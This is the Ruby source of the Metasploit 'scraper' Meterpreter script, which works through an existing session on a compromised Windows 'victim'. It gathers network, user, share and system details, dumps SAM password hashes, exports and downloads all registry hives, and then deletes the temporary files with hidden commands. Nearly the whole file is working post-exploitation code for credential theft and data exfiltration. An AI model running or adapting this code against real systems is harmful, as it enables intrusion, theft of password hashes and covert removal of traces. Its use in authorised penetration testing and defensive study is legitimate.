## # WARNING: Metasploit no longer maintains or accepts meterpreter scripts. # If you'd like to improve this script, please try to port it as a post # module instead. Thank you. ## # This is a Meterpreter script designed to be used by the Metasploit Framework # # The goal of this script is to obtain system information from a victim through # an existing Meterpreter session. This is only a simple example of what can # be accomplished through Meterpreter scripting. # # hdm[at]metasploit.com # opts = Rex::Parser::Arguments.new( "-h" => [ false,"Help menu." ] ) opts.parse(args) { |opt, idx, val| case opt when "-h" print_line("Scraper -- harvest system info including network shares, registry hives and password hashes") print_line("Info is stored in " + ::File.join(Msf::Config.log_directory,"scripts", "scraper")) print_line("USAGE: run scraper") print_line(opts.usage) raise Rex::Script::Completed end } require 'fileutils' # Some of this script was developed in conjunction with _MAX_ (max[at]remote-exploit.org) # The complete version will be released in the future as 'autometer' # Delete a file (meterpreter has no unlink API yet) def m_unlink(client, path) r = client.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => 'true'}) while(r.name) select(nil, nil, nil, 0.10) end r.close end def unsupported print_error("This version of Meterpreter is not supported with this Script!") raise Rex::Script::Completed end # Exec a command and return the results def m_exec(client, cmd) begin r = client.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true}) b = "" while(d = r.channel.read) b << d break if d == "" end r.channel.close r.close b rescue ::Exception => e print_error("Failed to run command #{cmd}") print_error("Error: #{e.class} #{e}") end end # Extract the host and port host,port = client.session_host, client.session_port print_status("New session on #{host}:#{port}...") # Create a directory for the logs logs = ::File.join(Msf::Config.log_directory, 'scripts','scraper', host + "_" + Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000)) ) # Create the log directory ::FileUtils.mkdir_p(logs) unsupported if client.platform != 'windows' begin tmp = client.sys.config.getenv('TEMP') print_status("Gathering basic system information...") ::File.open(File.join(logs, "network.txt"), "w") do |fd| fd.puts("=" * 70) client.net.config.each_route do |route| fd.puts("Local subnet: #{route.subnet}/#{route.netmask}") end fd.puts("=" * 70) fd.puts(m_exec(client, "netstat -na")) fd.puts("=" * 70) fd.puts(m_exec(client, "netstat -ns")) end info = client.sys.config.sysinfo() ::File.open(File.join(logs, "system.txt"), "w") do |fd| fd.puts("Computer: #{info['Computer']}") fd.puts("OS: #{info['OS']}") end ::File.open(File.join(logs, "env.txt"), "w") do |fd| fd.puts(m_exec(client, "cmd.exe /c set")) end ::File.open(File.join(logs, "users.txt"), "w") do |fd| fd.puts(m_exec(client, "net user")) end ::File.open(File.join(logs, "shares.txt"), "w") do |fd| fd.puts(m_exec(client, "net share")) end ::File.open(File.join(logs, "services.txt"), "w") do |fd| fd.puts(m_exec(client, "net start")) end ::File.open(File.join(logs, "nethood.txt"), "w") do |fd| fd.puts(m_exec(client, "net view")) end ::File.open(File.join(logs, "localgroup.txt"), "w") do |fd| fd.puts(m_exec(client, "net localgroup")) end ::File.open(File.join(logs, "group.txt"), "w") do |fd| fd.puts(m_exec(client, "net group")) end ::File.open(File.join(logs, "systeminfo.txt"), "w") do |fd| fd.puts(m_exec(client, "systeminfo")) end begin client.core.use("priv") hashes = client.priv.sam_hashes print_status("Dumping password hashes...") ::File.open(File.join(logs, "hashes.txt"), "w") do |fd| hashes.each do |user| fd.puts(user.to_s) end end rescue ::Exception => e print_status("Error dumping hashes: #{e.class} #{e}") end print_status("Obtaining the entire registry...") hives = %w{HKCU HKLM HKCC HKCR HKU} hives.each do |hive| print_status(" Exporting #{hive}") tempname = "#{tmp}\\#{Rex::Text.rand_text_alpha(8)}.reg" m_exec(client, "reg.exe export #{hive} #{tempname}") print_status(" Downloading #{hive} (#{tempname})") client.fs.file.download_file(File.join(logs, "#{hive}.reg"), tempname) print_status(" Cleaning #{hive}") m_unlink(client, tempname) end print_status("Completed processing on #{host}:#{port}...") rescue ::Exception => e print_status("Exception: #{e.class} #{e} #{e.backtrace}") end